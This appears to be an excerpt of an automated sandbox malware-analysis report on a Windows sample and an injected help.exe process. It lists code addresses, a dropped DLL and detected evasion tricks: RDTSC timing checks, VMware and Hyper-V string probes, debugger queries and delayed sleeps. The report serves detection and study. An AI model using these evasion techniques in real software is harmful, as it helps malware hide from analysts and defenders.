Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_004106D4 push cs; iretd
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00414F4F push ss; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B1D0D1 push ecx; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_1_0041C9AD push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_1_0040D291 push ebp; iretd
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_1_0041B3C5 push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_1_0040C394 pushad ; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_1_0041B47C push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_1_0041B412 push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_1_0041B41B push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_1_00414E45 push ebp; iretd
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_1_004106D4 push cs; iretd
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_1_00414F4F push ss; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_02F4D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_0057C9AD push eax; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_0056D291 push ebp; iretd
Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_0057B3C5 push eax; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_0056C394 pushad ; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_0057B47C push eax; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_0057B412 push eax; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_0057B41B push eax; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_0057C4F5 push cs; iretd
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | File created: C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\help.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_004088C0 rdtsc
Source: C:\Windows\explorer.exe TID: 6128 | Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\help.exe TID: 5796 | Thread sleep time: -48000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 0_2_0040263E FindFirstFileA,
Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000002.00000000.244267378.0000000001398000.00000004.00000020.sdmp | Binary or memory string: War&Prod_VMware_SATAR
Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.234998239.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.227568679.0000000004E61000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAv
Source: explorer.exe, 00000002.00000000.255829741.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.235308086.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000002.00000000.228165850.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00409B30 LdrLoadDll,
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AFF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AFF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B090AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AC9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B43884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AC58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AEB8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AC40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B5B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AEA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B94015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B82073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B91074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AE0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AF61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AE99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B469A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B849A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AFA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AEC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AF2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B541E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AE4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AF513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00ACC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00ACB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AEB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00ADAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AFFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AFD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AF2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AF2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B04A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AD8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AE3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AC5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B0927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B7B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B98A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B54257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B8EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00B95BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AD1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00AF138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
